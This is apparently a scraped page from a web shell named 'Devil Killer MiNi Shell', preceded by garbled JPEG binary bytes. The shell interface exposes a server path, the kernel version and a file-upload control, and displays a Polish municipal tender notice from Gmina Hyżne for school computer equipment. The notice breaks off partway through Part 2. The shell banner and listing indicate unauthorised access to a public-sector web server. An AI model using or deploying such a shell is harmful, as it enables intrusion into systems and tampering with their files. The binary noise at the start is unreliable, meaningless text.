JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250430/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250430/0021406201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu komputerowego oraz pomocy dydaktycznych w ramach projektu „Rozwój edukacji na terenie gminy Hyżne” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA HYŻNE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690582080</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">103</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Hyżne</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-024</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">17 23 045 60</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gzeas@hyzne.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://pzp.hyzne.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Gminny Zespół Ekonomiczno-Administracyjny Szkół w Hyżnem</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">813-33-03-324</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Hyżne 103</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Hyżne</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">36-024</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">(17) 22 95 005</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">gzeas@hyzne.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.gzeashyzne.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu komputerowego oraz pomocy dydaktycznych w ramach projektu „Rozwój edukacji na terenie gminy Hyżne” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c185145a-21b9-45ab-b393-85e3a3171f04</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00214062</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00067428/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa sprzętu komputerowego oraz pomocy dydaktycznych w ramach projektu „Rozwój edukacji na terenie gminy Hyżne&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Rozwój edukacji na terenie gminy Hyżne” FEPK.07.12-IP.01-0016/23 Projekt współfiansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego Plus w ramach programu regionalnego Fundusze Europejskie dla Podkarpacia 2021-2027. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> ZETOPZP: https://pzp.hyzne.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Platformy Zamówień Publicznych ZETOPZP: https://pzp.hyzne.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym <br/>a Wykonawcami odbywa się elektronicznie przy użyciu:<br/>1)	Platformy Zamówień Publicznych ZETOPZP: https://pzp.hyzne.pl/<br/>2.	We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający <br/>i Wykonawcy posługują się nadanym przez Zamawiającego numerem sprawy: GZEAS.261.1.2025 lub identyfikatorem postępowania wygenerowanym przez ZETOPZP: https://pzp.hyzne.pl/<br/>3.	Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami: <br/>1)	w zakresie procedury udzielenia zamówienia: <br/>	Joanna Groszek tel. 535 953 907<br/> 4. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie rejestrując się lub logując, w<br/> przypadku posiadania konta w Platformie Zamówień Publicznych ZETOPZP, akceptuje warunki korzystania z Platformy, określone w<br/> Regulaminie zamieszczonym na stronie internetowej https://pzp.hyzne.pl/ oraz uznaje go za wiążący.<br/> 5. Ogólne zasady korzystania z Platformy:<br/> 1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie<br/> https://pzp.hyzne.pl/#/authentication/login;<br/> 2) Wykonawca aby przystąpić do postępowania musi założyć konto na Platformie https://pzp.hyzne.pl/#/authentication/login gdzie<br/> zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki<br/> procesu rejestracyjnego; podaje adres e-mail, otrzymuje link aktywacyjny a następnie ustanawia hasło;<br/> 3) Proces rejestracji Wykonawcy jest w pełni automatyczny, po zarejestrowaniu należy podać dane firmy, którą osoba zakładająca<br/> konto reprezentuje.<br/> 4) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a<br/> Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem<br/> Platformy i powiadomień mailowych.<br/> 5) Zamawiający, zgodnie z § 3 ust. 3 Rozporządzenia Prezesa Rady Ministrów z dnia 27 czerwca 2017 r. (Dz. U. z 2020r. poz. 1261)<br/> w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępniania i<br/> przechowywania dokumentów elektronicznych (dalej jako &#34;Rozporządzenie&#34;) określa niezbędne wymagania sprzętowo - aplikacyjne<br/> umożliwiające pracę na Platformie Zakupowej, tj.: <br/>6) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/> 7) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/> operacyjnych - MS Windows 10, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/> 8) zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji obsługująca TLS 1.2 z wyjątkiem Internet<br/> Explorer;<br/> 9) Włączona obsługa JavaScript;<br/> 10) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.;<br/> 11) Podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę certyfikatu używanego przez<br/> Wykonawcę.<br/> 12) Zamawiający, zgodnie z § 3 ust. 3 powołanego powyżej Rozporządzenia określa:<br/> 13) dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100 MB <br/>w formatach: .doc, .pdf, .zip.;<br/> 14) informacje na temat kodowania i czasu odbioru danych: - plik załączony przez Wykonawcę na Platformie Zamówień Publicznych<br/> ZETOPZP i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna<br/> jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert;<br/> 15) Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu platformy<br/> ZETOPZP, który jest synchronizowany ze znacznikiem czasu UTC.<br/> 16) Wykonawca powinien dokładnie zapoznać się z niniejszą SWZ i złożyć ofertę zgodnie z jej wymaganiami.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Działając na podstawie art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r., w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE („RODO”) informujemy, że przetwarzamy dane osobowe. <br/>1. Administratorem danych osobowych jest Wójt Gminy Hyżne. Z Administratorem Danych osobowych można się kontaktować: listownie, na adres: Gmina Hyżne 36-024 Hyżne 103 oraz za pośrednictwem poczty e – mail, na adres: urzad@hyzne.pl<br/>2. Administrator danych osobowych powołał Inspektora ochrony danych, z którym można się kontaktować listownie na adres: Gmina Hyżne 36-024 Hyżne 103 oraz za pośrednictwem poczty <br/>e – mail, na adres: iod@hyzne.pl<br/>3. Dane osobowe są przetwarzane na podstawie art.6 ust.1 lit.c RODO w celu związanym <br/>z postępowaniem o udzielenie zamówienia publicznego „Dostawa sprzętu komputerowego oraz pomocy dydaktycznych” w ramach Projektu „Rozwój edukacji na terenie gminy Hyżne”, FEPK.07.12-IP.01-0016/23 współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego Plus w ramach programu regionalnego Fundusze Europejskie dla Podkarpacia 2021-2027 w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego, zawarcia i realizacji umowy z wyłonionym Wykonawcą, dokonania rozliczenia <br/>i płatności w związku z umową, przeprowadzania postępowań kontrolnych i audytów, udostępniania dokumentacji postępowania w trybie przepisów o dostępie do informacji publicznej, archiwizacji. <br/>4. Odbiorcami danych osobowych mogą być osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o właściwe przepisy Ustawy z dnia 11 września 2019r. Prawo zamówień publicznych, podmioty uprawnione jeżeli wykażą interes prawny lub faktyczny w otrzymaniu Pana/Pani danych osobowych na podstawie obowiązujących przepisów prawa, podmioty przetwarzające na podstawie wiążących umów powierzenia lub inni administratorzy danych przetwarzający Pani/Pana dane we własnym imieniu. <br/>5. Dane osobowe będą przetwarzane zgodnie z Ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, w przypadku gdy zamówienie publiczne będzie współfinansowane <br/>ze środków Unii Europejskiej, dane osobowe będą przechowywane przez okres wynikający <br/>z właściwych przepisów powszechnie obowiązującego prawa. Przetwarzanie danych osobowych po okresie realizacji umowy jest określone właściwymi przepisami w zakresie archiwizacji dokumentów. <br/>6. Informujemy o przysługujących prawach:<br/>•	na podstawie art.15 RODO prawo dostępu do danych osobowych,<br/>•	na podstawie art.16 RODO prawo do sprostowania lub uzupełnienia danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy <br/>w sprawie zamówienia publicznego w zakresie niezgodnym z Ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych. <br/>•	na podstawie art.18 RODO prawo żądania od Administratora danych osobowych ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art.18 ust.2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub <br/>z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>Szczegółowo opisano w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GZEAS.261.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1.<br/>Zakup i dostawa sprzętu komputerowego wraz z oprogramowaniem, urządzeń drukujących oraz pozostałych urządzeń elektronicznych.<br/> Przedmiotem zamówienia jest Dostawa sprzętu komputerowego oraz pomocy dydaktycznych w ramach projektu „Rozwój<br/> edukacji na terenie gminy Hyżne” FEPK.07.12-IP.01-0016/23 Projekt współfiansowany przez Unię Europejską ze środków<br/> Europejskiego Funduszu Społecznego Plus w ramach programu regionalnego Fundusze Europejskie dla Podkarpacia 2021<br/>2027.<br/> Zakres dostawy, wymagań Zamawiającego oraz czynności do wykonania przez<br/> Wykonawcę został określony w załączniku do SWZ 3 a, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30231320-6 - Monitory dotykowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32322000-6 - Urządzenia multimedialne</p> <p class="mb-0">33195100-4 - Monitory</p> <p class="mb-0">30237200-1 - Akcesoria komputerowe</p> <p class="mb-0">30213100-6 - Komputery przenośne</p> <p class="mb-0">30236000-2 - Różny sprzęt komputerowy</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">48700000-5 - Pakiety oprogramowania użytkowego</p> <p class="mb-0">48900000-7 - Różne pakiety oprogramowania i systemy komputerowe</p> <p class="mb-0">38652100-1 - Projektory</p> <p class="mb-0">30232110-8 - Drukarki laserowe</p> <p class="mb-0">42962000-7 - Urządzenia drukujące i graficzne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla części nr 1 <br/>Zakup i dostawa sprzętu komputerowego wraz z oprogramowaniem, urządzeń drukujących oraz pozostałych urządzeń elektronicznych.<br/>1.	Zamawiający będzie oceniał oferty według następujących kryteriów: <br/>Nr	Nazwa kryterium	Waga<br/>1	Cena	60<br/>2	Okres gwarancji jakości	30<br/>3	Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia	10<br/>Razem	100<br/>2.	Punkty przyznawane będą liczone według następujących wzorów: <br/>Nr i nazwa kryterium	Wzór<br/>1. Cena	Liczba punktów = (Cmin/Co) *waga<br/>gdzie: <br/>Cmin - najniższa cena spośród wszystkich ofert <br/>Co - cena podana w badanej ofercie <br/>2.Okres gwarancji jakości<br/><br/>Dotyczy pozycji od nr 1 do 22 z załącznika nr 3a do SWZ	1. Kryterium – „Okres gwarancji jakości”– poszczególnym ofertom zostaną przyznane punkty w oparciu o zadeklarowaną wartość oferowanego okresu gwarancji jakości na zrealizowane dostawy. <br/>Im dłuższy termin gwarancji jakości, tym większa liczba przyznanych punktów. Przy czym minimalny wymagany okres gwarancji jakości wynosi 24 miesiące. <br/>2. W przypadku nie uzupełnienia pola – okres gwarancji jakości– Zamawiający domyślnie ustala minimalny wymagany okres jako 24 miesiące. <br/>3. W przypadku wskazania okresu gwarancji jakości niższego niż minimalny wymagany okres tj. 24 miesiące – oferta będzie podlegać odrzuceniu, jako niezgodna z treścią SWZ (art. 226 ust 1 pkt 5) <br/>4. W przypadku wskazania okresu gwarancji jakości wyższego niż 36 miesięcy – oferta uzyska maksymalną ilość punktów w danym kryterium tj. 30pkt. <br/>5. Punktacja: <br/>- okres 24 m-cy – 0 pkt <br/>- okres 30 m-cy – 15 pkt <br/>- okres 36 m-cy – 30 pkt <br/>6. Maksymalnie w danym kryterium można otrzymać 30 pkt. <br/>3. Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia	1.	W ramach tego kryterium Wykonawcy ubiegający się o zamówienie publiczne mają możliwość zadeklarowania zatrudnienia osób społecznie marginalizowanych z dowolnej kategorii w obrębie katalogu zdefiniowanego w art. 94 ust. 1 ustawy Pzp.<br/>2.	Zamawiający dopuszcza zatrudnienie na podstawie stosunku pracy albo umowy cywilnoprawnej, w zależności od charakteru czynności, jakie będą wykonywały osoby z grup społecznie marginalizowanych.<br/>3.	Deklarowane zatrudnienie osób z grup społecznie marginalizowanych musi obejmować co najmniej 5 godzin tygodniowo w odniesieniu do każdej z zatrudnionych osób, <br/>w ramach okresu realizacji zamówienia publicznego.<br/>4.	Wykonawca uzyska punkty wyliczone zgodnie z poniższym wzorem:<br/>Liczba punktów = [Lo / Ln] x 100 pkt x 10%<br/> gdzie:<br/>Lo - zadeklarowana liczba osób społecznie marginalizowanych <br/>w badanej ofercie <br/>Ln - najwyższa zadeklarowana liczba osób społecznie marginalizowanych w badanych ofertach <br/>5.	W przypadku braku deklaracji w formularzu ofertowym dotyczącej zatrudnienia osób z grup społecznie marginalizowanych, zamawiający przyzna wykonawcy <br/>0 punktów w tym kryterium.<br/>6.	Maksymalnie w danym kryterium można otrzymać 10 pkt.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).<br/>Ocenie będą podlegały oferty niepodlegające odrzuceniu. Obliczenie będzie dokonywane <br/>z dokładnością do dwóch miejsc po przecinku</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2.<br/>Zakup i dostawa pomocy dydaktycznych oraz sprzętu do integracji sensorycznej.<br/><br/>Przedmiotem zamówienia jest Dostawa sprzętu komputerowego oraz pomocy dydaktycznych w ramach projektu „Rozwój<br/> edukacji na terenie gminy Hyżne” 